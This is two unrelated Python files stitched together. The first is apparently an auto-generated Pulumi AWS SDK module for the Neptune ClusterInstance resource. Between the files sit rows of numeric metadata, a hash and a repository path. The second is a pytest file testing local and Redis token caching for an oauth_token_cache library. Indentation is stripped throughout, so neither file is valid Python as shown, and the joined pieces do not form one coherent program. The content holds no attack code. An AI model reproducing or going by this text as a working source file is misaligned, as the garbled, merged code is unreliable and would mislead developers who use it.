@apply_immediately.setter
def apply_immediately(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "apply_immediately", value)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) of neptune instance
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="autoMinorVersionUpgrade")
def auto_minor_version_upgrade(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
"""
return pulumi.get(self, "auto_minor_version_upgrade")
@auto_minor_version_upgrade.setter
def auto_minor_version_upgrade(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_minor_version_upgrade", value)
@property
@pulumi.getter(name="availabilityZone")
def availability_zone(self) -> Optional[pulumi.Input[str]]:
"""
The EC2 Availability Zone that the neptune instance is created in.
"""
return pulumi.get(self, "availability_zone")
@availability_zone.setter
def availability_zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "availability_zone", value)
@property
@pulumi.getter(name="clusterIdentifier")
def cluster_identifier(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the `neptune.Cluster` in which to launch this instance.
"""
return pulumi.get(self, "cluster_identifier")
@cluster_identifier.setter
def cluster_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_identifier", value)
@property
@pulumi.getter(name="dbiResourceId")
def dbi_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The region-unique, immutable identifier for the neptune instance.
"""
return pulumi.get(self, "dbi_resource_id")
@dbi_resource_id.setter
def dbi_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dbi_resource_id", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The connection endpoint in `address:port` format.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def engine(self) -> Optional[pulumi.Input[str]]:
"""
The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
"""
return pulumi.get(self, "engine")
@engine.setter
def engine(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine", value)
@property
@pulumi.getter(name="engineVersion")
def engine_version(self) -> Optional[pulumi.Input[str]]:
"""
The neptune engine version.
"""
return pulumi.get(self, "engine_version")
@engine_version.setter
def engine_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine_version", value)
@property
@pulumi.getter
def identifier(self) -> Optional[pulumi.Input[str]]:
"""
The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
"""
return pulumi.get(self, "identifier")
@identifier.setter
def identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identifier", value)
@property
@pulumi.getter(name="identifierPrefix")
def identifier_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
"""
return pulumi.get(self, "identifier_prefix")
@identifier_prefix.setter
def identifier_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identifier_prefix", value)
@property
@pulumi.getter(name="instanceClass")
def instance_class(self) -> Optional[pulumi.Input[str]]:
"""
The instance class to use.
"""
return pulumi.get(self, "instance_class")
@instance_class.setter
def instance_class(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_class", value)
@property
@pulumi.getter(name="kmsKeyArn")
def kms_key_arn(self) -> Optional[pulumi.Input[str]]:
"""
The ARN for the KMS encryption key if one is set to the neptune cluster.
"""
return pulumi.get(self, "kms_key_arn")
@kms_key_arn.setter
def kms_key_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_arn", value)
@property
@pulumi.getter(name="neptuneParameterGroupName")
def neptune_parameter_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the neptune parameter group to associate with this instance.
"""
return pulumi.get(self, "neptune_parameter_group_name")
@neptune_parameter_group_name.setter
def neptune_parameter_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "neptune_parameter_group_name", value)
@property
@pulumi.getter(name="neptuneSubnetGroupName")
def neptune_subnet_group_name(self) -> Optional[pulumi.Input[str]]:
"""
A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
"""
return pulumi.get(self, "neptune_subnet_group_name")
@neptune_subnet_group_name.setter
def neptune_subnet_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "neptune_subnet_group_name", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port on which the DB accepts connections. Defaults to `8182`.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="preferredBackupWindow")
def preferred_backup_window(self) -> Optional[pulumi.Input[str]]:
"""
The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
"""
return pulumi.get(self, "preferred_backup_window")
@preferred_backup_window.setter
def preferred_backup_window(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "preferred_backup_window", value)
@property
@pulumi.getter(name="preferredMaintenanceWindow")
def preferred_maintenance_window(self) -> Optional[pulumi.Input[str]]:
"""
The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
"""
return pulumi.get(self, "preferred_maintenance_window")
@preferred_maintenance_window.setter
def preferred_maintenance_window(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "preferred_maintenance_window", value)
@property
@pulumi.getter(name="promotionTier")
def promotion_tier(self) -> Optional[pulumi.Input[int]]:
"""
Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
"""
return pulumi.get(self, "promotion_tier")
@promotion_tier.setter
def promotion_tier(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "promotion_tier", value)
@property
@pulumi.getter(name="publiclyAccessible")
def publicly_accessible(self) -> Optional[pulumi.Input[bool]]:
"""
Bool to control if instance is publicly accessible. Default is `false`.
"""
return pulumi.get(self, "publicly_accessible")
@publicly_accessible.setter
def publicly_accessible(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "publicly_accessible", value)
@property
@pulumi.getter(name="storageEncrypted")
def storage_encrypted(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the neptune cluster is encrypted.
"""
return pulumi.get(self, "storage_encrypted")
@storage_encrypted.setter
def storage_encrypted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "storage_encrypted", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the instance.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def writer(self) -> Optional[pulumi.Input[bool]]:
"""
Boolean indicating if this instance is writable. `False` indicates this instance is a read replica.
"""
return pulumi.get(self, "writer")
@writer.setter
def writer(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "writer", value)
class ClusterInstance(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
apply_immediately: Optional[pulumi.Input[bool]] = None,
auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
availability_zone: Optional[pulumi.Input[str]] = None,
cluster_identifier: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
identifier: Optional[pulumi.Input[str]] = None,
identifier_prefix: Optional[pulumi.Input[str]] = None,
instance_class: Optional[pulumi.Input[str]] = None,
neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
preferred_backup_window: Optional[pulumi.Input[str]] = None,
preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
promotion_tier: Optional[pulumi.Input[int]] = None,
publicly_accessible: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
A Cluster Instance Resource defines attributes that are specific to a single instance in a Neptune Cluster.
You can simply add neptune instances and Neptune manages the replication. You can use the [count](https://www.terraform.io/docs/configuration/meta-arguments/count.html)
meta-parameter to make multiple instances and join them all to the same Neptune Cluster, or you may specify different Cluster Instance resources with various `instance_class` sizes.
## Example Usage
The following example will create a neptune cluster with two neptune instances(one writer and one reader).
```python
import pulumi
import pulumi_aws as aws
default = aws.neptune.Cluster("default",
cluster_identifier="neptune-cluster-demo",
engine="neptune",
backup_retention_period=5,
preferred_backup_window="07:00-09:00",
skip_final_snapshot=True,
iam_database_authentication_enabled=True,
apply_immediately=True)
example = []
for range in [{"value": i} for i in range(0, 2)]:
example.append(aws.neptune.ClusterInstance(f"example-{range['value']}",
cluster_identifier=default.id,
engine="neptune",
instance_class="db.r4.large",
apply_immediately=True))
```
## Import
`aws_neptune_cluster_instance` can be imported by using the instance identifier, e.g.
```sh
$ pulumi import aws:neptune/clusterInstance:ClusterInstance example my-instance
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] apply_immediately: Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
:param pulumi.Input[bool] auto_minor_version_upgrade: Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
:param pulumi.Input[str] availability_zone: The EC2 Availability Zone that the neptune instance is created in.
:param pulumi.Input[str] cluster_identifier: The identifier of the `neptune.Cluster` in which to launch this instance.
:param pulumi.Input[str] engine: The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
:param pulumi.Input[str] engine_version: The neptune engine version.
:param pulumi.Input[str] identifier: The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
:param pulumi.Input[str] identifier_prefix: Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
:param pulumi.Input[str] instance_class: The instance class to use.
:param pulumi.Input[str] neptune_parameter_group_name: The name of the neptune parameter group to associate with this instance.
:param pulumi.Input[str] neptune_subnet_group_name: A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
:param pulumi.Input[int] port: The port on which the DB accepts connections. Defaults to `8182`.
:param pulumi.Input[str] preferred_backup_window: The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
:param pulumi.Input[str] preferred_maintenance_window: The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
:param pulumi.Input[int] promotion_tier: Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
:param pulumi.Input[bool] publicly_accessible: Bool to control if instance is publicly accessible. Default is `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the instance.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ClusterInstanceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Cluster Instance Resource defines attributes that are specific to a single instance in a Neptune Cluster.
You can simply add neptune instances and Neptune manages the replication. You can use the [count](https://www.terraform.io/docs/configuration/meta-arguments/count.html)
meta-parameter to make multiple instances and join them all to the same Neptune Cluster, or you may specify different Cluster Instance resources with various `instance_class` sizes.
## Example Usage
The following example will create a neptune cluster with two neptune instances(one writer and one reader).
```python
import pulumi
import pulumi_aws as aws
default = aws.neptune.Cluster("default",
cluster_identifier="neptune-cluster-demo",
engine="neptune",
backup_retention_period=5,
preferred_backup_window="07:00-09:00",
skip_final_snapshot=True,
iam_database_authentication_enabled=True,
apply_immediately=True)
example = []
for range in [{"value": i} for i in range(0, 2)]:
example.append(aws.neptune.ClusterInstance(f"example-{range['value']}",
cluster_identifier=default.id,
engine="neptune",
instance_class="db.r4.large",
apply_immediately=True))
```
## Import
`aws_neptune_cluster_instance` can be imported by using the instance identifier, e.g.
```sh
$ pulumi import aws:neptune/clusterInstance:ClusterInstance example my-instance
```
:param str resource_name: The name of the resource.
:param ClusterInstanceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ClusterInstanceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
apply_immediately: Optional[pulumi.Input[bool]] = None,
auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
availability_zone: Optional[pulumi.Input[str]] = None,
cluster_identifier: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
identifier: Optional[pulumi.Input[str]] = None,
identifier_prefix: Optional[pulumi.Input[str]] = None,
instance_class: Optional[pulumi.Input[str]] = None,
neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
preferred_backup_window: Optional[pulumi.Input[str]] = None,
preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
promotion_tier: Optional[pulumi.Input[int]] = None,
publicly_accessible: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ClusterInstanceArgs.__new__(ClusterInstanceArgs)
__props__.__dict__["apply_immediately"] = apply_immediately
__props__.__dict__["auto_minor_version_upgrade"] = auto_minor_version_upgrade
__props__.__dict__["availability_zone"] = availability_zone
if cluster_identifier is None and not opts.urn:
raise TypeError("Missing required property 'cluster_identifier'")
__props__.__dict__["cluster_identifier"] = cluster_identifier
__props__.__dict__["engine"] = engine
__props__.__dict__["engine_version"] = engine_version
__props__.__dict__["identifier"] = identifier
__props__.__dict__["identifier_prefix"] = identifier_prefix
if instance_class is None and not opts.urn:
raise TypeError("Missing required property 'instance_class'")
__props__.__dict__["instance_class"] = instance_class
__props__.__dict__["neptune_parameter_group_name"] = neptune_parameter_group_name
__props__.__dict__["neptune_subnet_group_name"] = neptune_subnet_group_name
__props__.__dict__["port"] = port
__props__.__dict__["preferred_backup_window"] = preferred_backup_window
__props__.__dict__["preferred_maintenance_window"] = preferred_maintenance_window
__props__.__dict__["promotion_tier"] = promotion_tier
__props__.__dict__["publicly_accessible"] = publicly_accessible
__props__.__dict__["tags"] = tags
__props__.__dict__["address"] = None
__props__.__dict__["arn"] = None
__props__.__dict__["dbi_resource_id"] = None
__props__.__dict__["endpoint"] = None
__props__.__dict__["kms_key_arn"] = None
__props__.__dict__["storage_encrypted"] = None
__props__.__dict__["writer"] = None
super(ClusterInstance, __self__).__init__(
'aws:neptune/clusterInstance:ClusterInstance',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
address: Optional[pulumi.Input[str]] = None,
apply_immediately: Optional[pulumi.Input[bool]] = None,
arn: Optional[pulumi.Input[str]] = None,
auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,
availability_zone: Optional[pulumi.Input[str]] = None,
cluster_identifier: Optional[pulumi.Input[str]] = None,
dbi_resource_id: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
identifier: Optional[pulumi.Input[str]] = None,
identifier_prefix: Optional[pulumi.Input[str]] = None,
instance_class: Optional[pulumi.Input[str]] = None,
kms_key_arn: Optional[pulumi.Input[str]] = None,
neptune_parameter_group_name: Optional[pulumi.Input[str]] = None,
neptune_subnet_group_name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
preferred_backup_window: Optional[pulumi.Input[str]] = None,
preferred_maintenance_window: Optional[pulumi.Input[str]] = None,
promotion_tier: Optional[pulumi.Input[int]] = None,
publicly_accessible: Optional[pulumi.Input[bool]] = None,
storage_encrypted: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
writer: Optional[pulumi.Input[bool]] = None) -> 'ClusterInstance':
"""
Get an existing ClusterInstance resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] address: The hostname of the instance. See also `endpoint` and `port`.
:param pulumi.Input[bool] apply_immediately: Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of neptune instance
:param pulumi.Input[bool] auto_minor_version_upgrade: Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
:param pulumi.Input[str] availability_zone: The EC2 Availability Zone that the neptune instance is created in.
:param pulumi.Input[str] cluster_identifier: The identifier of the `neptune.Cluster` in which to launch this instance.
:param pulumi.Input[str] dbi_resource_id: The region-unique, immutable identifier for the neptune instance.
:param pulumi.Input[str] endpoint: The connection endpoint in `address:port` format.
:param pulumi.Input[str] engine: The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
:param pulumi.Input[str] engine_version: The neptune engine version.
:param pulumi.Input[str] identifier: The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
:param pulumi.Input[str] identifier_prefix: Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
:param pulumi.Input[str] instance_class: The instance class to use.
:param pulumi.Input[str] kms_key_arn: The ARN for the KMS encryption key if one is set to the neptune cluster.
:param pulumi.Input[str] neptune_parameter_group_name: The name of the neptune parameter group to associate with this instance.
:param pulumi.Input[str] neptune_subnet_group_name: A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
:param pulumi.Input[int] port: The port on which the DB accepts connections. Defaults to `8182`.
:param pulumi.Input[str] preferred_backup_window: The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
:param pulumi.Input[str] preferred_maintenance_window: The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
:param pulumi.Input[int] promotion_tier: Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
:param pulumi.Input[bool] publicly_accessible: Bool to control if instance is publicly accessible. Default is `false`.
:param pulumi.Input[bool] storage_encrypted: Specifies whether the neptune cluster is encrypted.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the instance.
:param pulumi.Input[bool] writer: Boolean indicating if this instance is writable. `False` indicates this instance is a read replica.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ClusterInstanceState.__new__(_ClusterInstanceState)
__props__.__dict__["address"] = address
__props__.__dict__["apply_immediately"] = apply_immediately
__props__.__dict__["arn"] = arn
__props__.__dict__["auto_minor_version_upgrade"] = auto_minor_version_upgrade
__props__.__dict__["availability_zone"] = availability_zone
__props__.__dict__["cluster_identifier"] = cluster_identifier
__props__.__dict__["dbi_resource_id"] = dbi_resource_id
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["engine"] = engine
__props__.__dict__["engine_version"] = engine_version
__props__.__dict__["identifier"] = identifier
__props__.__dict__["identifier_prefix"] = identifier_prefix
__props__.__dict__["instance_class"] = instance_class
__props__.__dict__["kms_key_arn"] = kms_key_arn
__props__.__dict__["neptune_parameter_group_name"] = neptune_parameter_group_name
__props__.__dict__["neptune_subnet_group_name"] = neptune_subnet_group_name
__props__.__dict__["port"] = port
__props__.__dict__["preferred_backup_window"] = preferred_backup_window
__props__.__dict__["preferred_maintenance_window"] = preferred_maintenance_window
__props__.__dict__["promotion_tier"] = promotion_tier
__props__.__dict__["publicly_accessible"] = publicly_accessible
__props__.__dict__["storage_encrypted"] = storage_encrypted
__props__.__dict__["tags"] = tags
__props__.__dict__["writer"] = writer
return ClusterInstance(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def address(self) -> pulumi.Output[str]:
"""
The hostname of the instance. See also `endpoint` and `port`.
"""
return pulumi.get(self, "address")
@property
@pulumi.getter(name="applyImmediately")
def apply_immediately(self) -> pulumi.Output[bool]:
"""
Specifies whether any instance modifications
are applied immediately, or during the next maintenance window. Default is`false`.
"""
return pulumi.get(self, "apply_immediately")
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN) of neptune instance
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="autoMinorVersionUpgrade")
def auto_minor_version_upgrade(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates that minor engine upgrades will be applied automatically to the instance during the maintenance window. Default is `true`.
"""
return pulumi.get(self, "auto_minor_version_upgrade")
@property
@pulumi.getter(name="availabilityZone")
def availability_zone(self) -> pulumi.Output[str]:
"""
The EC2 Availability Zone that the neptune instance is created in.
"""
return pulumi.get(self, "availability_zone")
@property
@pulumi.getter(name="clusterIdentifier")
def cluster_identifier(self) -> pulumi.Output[str]:
"""
The identifier of the `neptune.Cluster` in which to launch this instance.
"""
return pulumi.get(self, "cluster_identifier")
@property
@pulumi.getter(name="dbiResourceId")
def dbi_resource_id(self) -> pulumi.Output[str]:
"""
The region-unique, immutable identifier for the neptune instance.
"""
return pulumi.get(self, "dbi_resource_id")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
The connection endpoint in `address:port` format.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter
def engine(self) -> pulumi.Output[Optional[str]]:
"""
The name of the database engine to be used for the neptune instance. Defaults to `neptune`. Valid Values: `neptune`.
"""
return pulumi.get(self, "engine")
@property
@pulumi.getter(name="engineVersion")
def engine_version(self) -> pulumi.Output[str]:
"""
The neptune engine version.
"""
return pulumi.get(self, "engine_version")
@property
@pulumi.getter
def identifier(self) -> pulumi.Output[str]:
"""
The identifier for the neptune instance, if omitted, this provider will assign a random, unique identifier.
"""
return pulumi.get(self, "identifier")
@property
@pulumi.getter(name="identifierPrefix")
def identifier_prefix(self) -> pulumi.Output[str]:
"""
Creates a unique identifier beginning with the specified prefix. Conflicts with `identifier`.
"""
return pulumi.get(self, "identifier_prefix")
@property
@pulumi.getter(name="instanceClass")
def instance_class(self) -> pulumi.Output[str]:
"""
The instance class to use.
"""
return pulumi.get(self, "instance_class")
@property
@pulumi.getter(name="kmsKeyArn")
def kms_key_arn(self) -> pulumi.Output[str]:
"""
The ARN for the KMS encryption key if one is set to the neptune cluster.
"""
return pulumi.get(self, "kms_key_arn")
@property
@pulumi.getter(name="neptuneParameterGroupName")
def neptune_parameter_group_name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the neptune parameter group to associate with this instance.
"""
return pulumi.get(self, "neptune_parameter_group_name")
@property
@pulumi.getter(name="neptuneSubnetGroupName")
def neptune_subnet_group_name(self) -> pulumi.Output[str]:
"""
A subnet group to associate with this neptune instance. **NOTE:** This must match the `neptune_subnet_group_name` of the attached `neptune.Cluster`.
"""
return pulumi.get(self, "neptune_subnet_group_name")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[int]]:
"""
The port on which the DB accepts connections. Defaults to `8182`.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="preferredBackupWindow")
def preferred_backup_window(self) -> pulumi.Output[str]:
"""
The daily time range during which automated backups are created if automated backups are enabled. Eg: "04:00-09:00"
"""
return pulumi.get(self, "preferred_backup_window")
@property
@pulumi.getter(name="preferredMaintenanceWindow")
def preferred_maintenance_window(self) -> pulumi.Output[str]:
"""
The window to perform maintenance in.
Syntax: "ddd:hh24:mi-ddd:hh24:mi". Eg: "Mon:00:00-Mon:03:00".
"""
return pulumi.get(self, "preferred_maintenance_window")
@property
@pulumi.getter(name="promotionTier")
def promotion_tier(self) -> pulumi.Output[Optional[int]]:
"""
Default 0. Failover Priority setting on instance level. The reader who has lower tier has higher priority to get promoter to writer.
"""
return pulumi.get(self, "promotion_tier")
@property
@pulumi.getter(name="publiclyAccessible")
def publicly_accessible(self) -> pulumi.Output[Optional[bool]]:
"""
Bool to control if instance is publicly accessible. Default is `false`.
"""
return pulumi.get(self, "publicly_accessible")
@property
@pulumi.getter(name="storageEncrypted")
def storage_encrypted(self) -> pulumi.Output[bool]:
"""
Specifies whether the neptune cluster is encrypted.
"""
return pulumi.get(self, "storage_encrypted")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the instance.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def writer(self) -> pulumi.Output[bool]:
"""
Boolean indicating if this instance is writable. `False` indicates this instance is a read replica.
"""
return pulumi.get(self, "writer")
| 48.657939
| 208
| 0.67107
| 6,832
| 57,611
| 5.44072
| 0.046253
| 0.08286
| 0.070808
| 0.06688
| 0.940464
| 0.926771
| 0.905948
| 0.896505
| 0.883807
| 0.86242
| 0
| 0.004665
| 0.22973
| 57,611
| 1,183
| 209
| 48.69907
| 0.832973
| 0.345889
| 0
| 0.794337
| 1
| 0
| 0.117532
| 0.044966
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168405
| false
| 0.00149
| 0.007452
| 0
| 0.278689
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4d157768f7b1be01c6f96b3cad2b6b848a827cf3
| 4,453
|
py
|
Python
|
test/oauth_token_cache_mechanism_test.py
|
delving-co/oauth-token-cache
|
6dcc016a736fd6a99470d0400ee6d9048b7dda82
|
[
"MIT"
] | 2
|
2019-10-27T07:39:36.000Z
|
2019-10-27T08:45:58.000Z
|
test/oauth_token_cache_mechanism_test.py
|
delving-co/oauth-token-cache
|
6dcc016a736fd6a99470d0400ee6d9048b7dda82
|
[
"MIT"
] | 7
|
2019-10-28T21:00:57.000Z
|
2020-09-22T11:10:11.000Z
|
test/oauth_token_cache_mechanism_test.py
|
delving-co/oauth-token-cache
|
6dcc016a736fd6a99470d0400ee6d9048b7dda82
|
[
"MIT"
] | 2
|
2020-02-20T09:51:43.000Z
|
2022-03-04T05:06:32.000Z
|
"""Test OAuthTokenCache.token() caching behaviour."""
import pytest
from unittest import mock
from oauth_token_cache import TokenClient
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_existing_local_token(
mock_fresh_token,
mock_cached_token,
oauth_token_cache_instance,
audience,
make_token,
):
"""Valid token in the local cache. Do not check the redis cache and do not issue a fresh token."""
token = make_token()
mock_fresh_token.return_value = token
oauth_token_cache_instance.tokens[audience] = token
assert oauth_token_cache_instance.token(audience=audience) == token
mock_fresh_token.assert_not_called()
mock_cached_token.assert_not_called()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_expired_local_token(
mock_fresh_token,
mock_cached_token,
oauth_token_cache_instance,
audience,
make_token,
):
"""Expired token in the local cache, no token in the redis cache. Issue a new token after checking both."""
token = make_token()
expired_token = make_token(expires_at=-1)
mock_cached_token.return_value = None
mock_fresh_token.return_value = token
oauth_token_cache_instance.tokens[audience] = expired_token
assert oauth_token_cache_instance.token(audience=audience) == token
mock_fresh_token.assert_called_once()
mock_cached_token.assert_called_once()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_redis_cache_hit(
mock_fresh_token,
mock_cached_token,
oauth_token_cache_instance,
audience,
make_token,
):
"""No token in the local cache, token cached in the redis cache. Return token from redis cache without
issueing a fresh token.
"""
token = make_token()
mock_cached_token.return_value = token
assert oauth_token_cache_instance.token(audience=audience) == token
mock_fresh_token.assert_not_called()
mock_cached_token.assert_called_once()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_multiple_redis_cache_hits(
mock_fresh_token,
mock_cached_token,
oauth_token_cache_instance,
audience,
make_token,
):
"""No token in the local cache, token cached in the redis cache. Return token from redis cache without
issueing a fresh token, but only check redis cache once.
"""
token = make_token()
mock_cached_token.return_value = token
for i in range(3):
assert oauth_token_cache_instance.token(audience=audience) == token
mock_fresh_token.assert_not_called()
mock_cached_token.assert_called_once()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_multiple_redis_cache_misses(
mock_fresh_token,
mock_cached_token,
oauth_token_cache_instance,
audience,
make_token,
):
"""No token in the local cache, no token in the redis cache. Issue a new token after checking both."""
token = make_token()
mock_fresh_token.return_value = token
mock_cached_token.return_value = None
for i in range(3):
assert oauth_token_cache_instance.token(audience=audience) == token
mock_fresh_token.assert_called_once()
